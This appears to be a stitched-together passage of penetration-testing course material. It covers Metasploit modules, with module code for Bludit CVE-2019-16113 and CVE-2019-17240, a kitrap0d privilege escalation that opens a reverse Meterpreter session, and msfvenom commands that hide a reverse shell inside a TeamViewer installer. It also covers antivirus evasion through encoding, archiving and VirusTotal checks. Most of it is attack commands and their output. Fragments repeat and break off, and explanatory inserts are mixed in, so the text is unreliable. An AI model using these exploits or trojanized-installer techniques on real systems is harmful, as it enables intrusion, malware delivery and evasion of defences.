SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 34 exploit checks are being tried...
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) >
Name     Current Setting                 Required  Description
----     ---------------                 --------  -----------
PASS     guest                           yes       The password to authenticate with
Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS                                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT    80                              yes       The target port (TCP)
SSL      false                           no        Negotiate SSL/TLS for outgoing connections
URI      /nagios3/cgi-bin/statuswml.cgi  yes       The full URI path to statuswml.cgi
USER     guest                           yes       The username to authenticate with
VHOST                                    no        HTTP server virtual host

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "Bludit Directory Traversal Image File Upload Vulnerability",
      'Description'    => %q{
        This module exploits a vulnerability in Bludit. A remote user could abuse the uuid
        parameter in the image upload feature in order to save a malicious payload anywhere
        onto the server, and then use a custom .htaccess file to bypass the file extension
        check to finally get remote code execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'christasa', # Original discovery
          'sinn3r'     # Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2019-16113'],
          ['URL', 'https://github.com/bludit/bludit/issues/1081'],
          ['URL', 'https://github.com/bludit/bludit/commit/a9640ff6b5f2c0fa770ad7758daf24fec6fbf3f5#diff-6f5ea518e6fc98fb4c16830bbf9f5dac']
        ],
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Notes'          =>
        {
          'SideEffects' => [ IOC_IN_LOGS ],
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability'   => [ CRASH_SAFE ]
        },
      'Targets'        => [ [ 'Bludit v3.9.2', {} ] ],
      'Privileged'     => false,
      'DisclosureDate' => "2019-09-07",
      'DefaultTarget'  => 0))
With the general identifying information filled in, we can move on to the option variables:
Proof of Concept - Functions
Code: Ruby
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path for Bludit', '/']),
        OptString.new('BLUDITUSER', [true, 'The username for Bludit']),
        OptString.new('BLUDITPASS', [true, 'The password for Bludit'])
      ])
  end

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "Bludit 3.9.2 - Authentication Bruteforce Mitigation Bypass",
      'Description'    => %q{
        Versions prior to and including 3.9.2 of the Bludit CMS are vulnerable to a bypass of
        the anti-brute force mechanism that is in place to block users that have attempted to
        login incorrectly ten times or more. Within the bl-kernel/security.class.php file, a
        function named getUserIp attempts to determine the valid IP address of the end-user by
        trusting the X-Forwarded-For and Client-IP HTTP headers.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'rastating', # Original discovery
          '0ne-nine9'  # Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2019-17240'],
          ['URL', 'https://rastating.github.io/bludit-brute-force-mitigation-bypass/'],
          ['PATCH', 'https://github.com/bludit/bludit/pull/1090']
        ],
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Notes'          =>
        {
          'SideEffects' => [ IOC_IN_LOGS ],
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability'   => [ CRASH_SAFE ]
        },
      'Targets'        => [ [ 'Bludit v3.9.2', {} ] ],
      'Privileged'     => false,
      'DisclosureDate' => "2019-10-05",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path for Bludit', '/']),
        OptString.new('BLUDITUSER', [true, 'The username for Bludit']),
        OptPath.new('PASSWORDS', [ true, 'The list of passwords', File.join(Msf::Config.data_directory, "wordlists", "passwords.txt") ])
      ])
  end

  # -- Exploit code -- #

  # dirty workaround to remove this warning:
  # Cookie#domain returns dot-less domain name now. Use Cookie#dot_domain if you need "." at the beginning.
  # see https://github.com/nahi/httpclient/issues/252
  class WebAgent
    class Cookie < HTTP::Cookie
      def domain
        self.original_domain
      end
    end
  end

  # Fetches the login page and pulls the hidden tokenCSRF value out of the form
  def get_csrf(client, login_url)
    res = client.get(login_url)
    csrf_token = /input.+?name="tokenCSRF".+?value="(.+?)"/.match(res.body).captures[0]
  end

  # A successful login is a redirect to the admin dashboard
  def auth_ok?(res)
    HTTP::Status.redirect?(res.code) && %r{/admin/dashboard}.match?(res.headers['Location'])
  end
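To make the two helpers above and the flaw the module's description names concrete, here is an added Ruby example that is not part of the module or of Bludit. It runs the same `tokenCSRF` regex and the same redirect check against constructed responses, and models the `bl-kernel/security.class.php` lockout as a small Ruby class whose failed-login counter is keyed on a `getUserIp` lookalike that trusts `X-Forwarded-For` and `Client-IP` before the real peer address. The server class, the credentials, the wordlist and the attacker address are all constructed; the per-attempt spoofed addresses are one way to vary the header (the original advisory used the password candidate itself).

```ruby
# Added example, not the module's or Bludit's code. Models the module's CSRF
# and auth checks plus the lockout bypass it exploits; everything below is
# constructed for illustration.
FakeResponse = Struct.new(:code, :body, :headers)

# Constructed Bludit-style login page carrying the hidden tokenCSRF input.
SAMPLE_LOGIN_PAGE = '<form method="post"><input type="hidden" id="jstokenCSRF" ' \
                    'name="tokenCSRF" value="d41d8cd98f00b204e9800998ecf8427e">' \
                    '<input type="text" name="username"></form>'

# Same regex as the module's get_csrf; returns nil when no token is present
# instead of raising on a page that lacks the form.
def extract_csrf(body)
  m = /input.+?name="tokenCSRF".+?value="(.+?)"/.match(body)
  m && m.captures[0]
end

# Same test as the module's auth_ok?: a 3xx redirect pointing at /admin/dashboard.
def auth_ok?(res)
  (300..399).cover?(res.code) && %r{/admin/dashboard}.match?(res.headers['Location'].to_s)
end

# Stand-in for the vulnerable server: the failure counter is keyed on user_ip,
# which (like getUserIp in security.class.php) prefers client-supplied headers.
class VulnerableLoginServer
  MAX_FAILURES = 10

  def initialize(user, password)
    @user = user
    @password = password
    @failures = Hash.new(0)
  end

  def user_ip(remote_addr, headers)   # the flaw: attacker-controlled headers win
    headers['X-Forwarded-For'] || headers['Client-IP'] || remote_addr
  end

  def login(remote_addr, headers, user, password)
    ip = user_ip(remote_addr, headers)
    return FakeResponse.new(200, 'IP address has been blocked', {}) if @failures[ip] >= MAX_FAILURES
    if user == @user && password == @password
      return FakeResponse.new(302, '', { 'Location' => '/admin/dashboard' })
    end
    @failures[ip] += 1
    FakeResponse.new(200, 'Username or password incorrect', {})
  end
end

# Tries each candidate once. With spoof: true every request carries a different
# X-Forwarded-For value, so no single "IP" ever reaches MAX_FAILURES.
def brute_force(server, user, passwords, attacker_ip: '10.10.14.5', spoof: true)
  passwords.each_with_index do |pw, i|
    headers = spoof ? { 'X-Forwarded-For' => "10.0.#{i / 256}.#{i % 256}" } : {}
    res = server.login(attacker_ip, headers, user, pw)
    return pw if auth_ok?(res)
  end
  nil
end
```

The fix referenced in the module's PATCH entry is the corresponding server-side change: derive the client address from the socket (or from a proxy header only when the request demonstrably came from a trusted proxy), never from headers the client can set.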
Today, these two tools combined give penetration testers a way to quickly craft payloads for different target host architectures and versions, while also being able to "clean" their shellcode so it does not run into errors when deployed. AV evasion is considerably more complex nowadays, because purely signature-based analysis of malicious files is a thing of the past. Heuristic analysis, machine learning, and deep packet inspection make it much harder for a payload to evade any decent AV product through a few successive iterations of an encoding scheme. As shown in the Payloads module, submitting a simple payload with the same configuration as above produced a hit rate of 52/65. As far as malware analysts around the world are concerned, that is bingo. (Whether malware analysts around the world actually say "that's bingo" remains unconfirmed.)
Creating Our Payload
Suppose we have found an open FTP port that either has weak credentials or has accidentally been left open to anonymous login. Now suppose the FTP server is linked to a web service running on tcp/80 on the same machine, and that every file found in the FTP root can be viewed from the web service's /uploads directory. Suppose further that the web service performs no checks on what we, as a client, are allowed to run on it.
Assuming we are allowed to invoke anything we want from the web service, we can upload a PHP shell directly through the FTP server and access it from the web, triggering the payload and giving us a reverse TCP connection from the victim machine.
Scanning the Target
vnswer77@htb[/htb]$ nmap -sV -T4 -p- 10.10.10.5
<SNIP>
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
80/tcp open  http    Microsoft IIS httpd 7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2819 bytes

<...SNIP...>
2375  post/multi/manage/screenshare                                   normal  No   Multi Manage the screen of the target meterpreter session
2376  post/multi/recon/local_exploit_suggester                        normal  No   Multi Recon Local Exploit Suggester
2377  post/osx/gather/apfs_encrypted_volume_passwd  2018-03-21        normal  Yes  Mac OS X APFS Encrypted Volume Password Disclosure
<SNIP>
msf6 exploit(multi/handler) > use 2376
msf6 post(multi/recon/local_exploit_suggester) > show options

Name             Current Setting  Required  Description
----             ---------------  --------  -----------
SESSION                           yes       The session to run this module on
SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits
msf6 post(multi/recon/local_exploit_suggester) > set session 2
session => 2
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 31 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

#  Name                                     Disclosure Date  Rank   Check  Description
-  ----                                     ---------------  ----   -----  -----------
0  exploit/windows/local/ms10_015_kitrap0d  2010-01-19       great  Yes    Windows SYSTEM Escalation via KiTrap0D

msf6 exploit(multi/handler) > use 0
msf6 exploit(windows/local/ms10_015_kitrap0d) > show options

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST     tun0             yes       The listen address (an interface may be specified)
LPORT     1338             yes       The listen port

Exploit target:

Id  Name
--  ----
0   Windows 2K SP4 - Windows 7 (x86)
msf6 exploit(windows/local/ms10_015_kitrap0d) > set LPORT 1338
LPORT => 1338
msf6 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 3
SESSION => 3
msf6 exploit(windows/local/ms10_015_kitrap0d) > run
[*] Started reverse TCP handler on 10.10.14.5:1338
[*] Launching notepad to host the exploit...
[+] Process 3552 launched.
[*] Reflectively injecting the exploit DLL into 3552...
[*] Injecting exploit into 3552 ...
[*] Exploit injected. Injecting payload into 3552...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (176195 bytes) to 10.10.10.5
[*] Meterpreter session 4 opened (10.10.14.5:1338 -> 10.10.10.5:49162) at 2020-08-28 17:15:56 +0000
vnswer77@htb[/htb]$ msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -x ~/Downloads/TeamViewer_Setup.exe -e x86/shikata_ga_nai -a x86 --platform windows -o ~/Desktop/TeamViewer_Setup.exe -i 5

Attempting to read payload from STDIN...
Found 1 compatible encoders
Attempting to encode payload with 5 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 27 (iteration=0)
x86/shikata_ga_nai succeeded with size 54 (iteration=1)
x86/shikata_ga_nai succeeded with size 81 (iteration=2)
x86/shikata_ga_nai succeeded with size 108 (iteration=3)
x86/shikata_ga_nai succeeded with size 135 (iteration=4)
x86/shikata_ga_nai chosen with final size 135
Payload size: 135 bytes
Saved as: /home/user/Desktop/TeamViewer_Setup.exe

Note that the command above omits the -p flag before the payload name, which is why msfvenom reports "Attempting to read payload from STDIN..." and ends up with a 27-byte payload rather than the Meterpreter stager; to embed the intended payload in the template, the invocation needs -p windows/x86/meterpreter_reverse_tcp.
Archiving information such as files, folders, scripts, executables, images or documents and putting a password on the archive bypasses many of today's common anti-virus signatures. The downside of this approach is that the archives will be raised as notifications in the AV alert dashboard, because they could not be scanned due to being password-locked. Administrators may then choose to inspect those archives manually to determine whether they are malicious.
Generating the Payload
vnswer77@htb[/htb]$ msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -e x86/shikata_ga_nai -a x86 --platform windows -o ~/test.js -i 5

Attempting to read payload from STDIN...
Found 1 compatible encoders
Attempting to encode payload with 5 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 27 (iteration=0)
x86/shikata_ga_nai succeeded with size 54 (iteration=1)
x86/shikata_ga_nai succeeded with size 81 (iteration=2)
x86/shikata_ga_nai succeeded with size 108 (iteration=3)
x86/shikata_ga_nai succeeded with size 135 (iteration=4)
x86/shikata_ga_nai chosen with final size 135
Payload size: 135 bytes
Saved as: /home/user/test.js

As before, the missing -p flag means msfvenom read its payload from STDIN (the 27-byte starting size shows it), so the file written here does not contain the Meterpreter payload; the intended command passes -p windows/x86/meterpreter_reverse_tcp.
[*] WARNING: When you upload or otherwise submit content, you give VirusTotal
[*] (and those we work with) a worldwide, royalty free, irrevocable and transferable
[*] licence to use, edit, host, store, reproduce, modify, create derivative works,
[*] communicate, publish, publicly perform, publicly display and distribute such
[*] content. To read the complete Terms of Service for VirusTotal, please go to the
[*] following link:
[*] https://www.virustotal.com/en/about/terms-of-service/
[*]
[*] If you prefer your own API key, you may obtain one at VirusTotal.

[*] Enter 'Y' to acknowledge: Y

[*] Using API key: <API key>
[*] Please wait while I upload test.js...
[*] VirusTotal: Scan request successfully queued, come back later for the report
[*] Sample MD5 hash : 35e7687f0793dc3e048d557feeaf615a
[*] Sample SHA1 hash : f2f1c4051d8e71df0741b40e4d91622c4fd27309
[*] Sample SHA256 hash : 08799c1b83de42ed43d86247ebb21cca95b100f6a45644e99b339422b7b44105
[*] Analysis link: https://www.virustotal.com/gui/file/<SNIP>/detection/f-<SNIP>-1652167047
[*] Requesting the report...
[*] Received code 0. Waiting for another 60 seconds...
[*] Analysis Report: test.js (11 / 59): <...SNIP...>
====================================================================================================

[*] Using API key: <API key>
[*] Please wait while I upload test2...
[*] VirusTotal: Scan request successfully queued, come back later for the report
[*] Sample MD5 hash : 2f25eeeea28f737917e59177be61be6d
[*] Sample SHA1 hash : c31d7f02cfadd87c430c2eadf77f287db4701429
[*] Sample SHA256 hash : 76ec64197aa2ac203a5faa303db94f530802462e37b6e1128377315a93d1c2ad
[*] Analysis link: https://www.virustotal.com/gui/file/<SNIP>/detection/f-<SNIP>-1652167804
[*] Requesting the report...
[*] Received code 0. Waiting for another 60 seconds...
[*] Received code -2. Waiting for another 60 seconds...
[*] Received code -2. Waiting for another 60 seconds...
[*] Received code -2. Waiting for another 60 seconds...
[*] Received code -2. Waiting for another 60 seconds...
[*] Received code -2. Waiting for another 60 seconds...
[*] Analysis Report: test2 (0 / 49): 76ec64197aa2ac203a5faa303db94f530802462e37b6e1128377315a93d1c2ad
=================================================================================================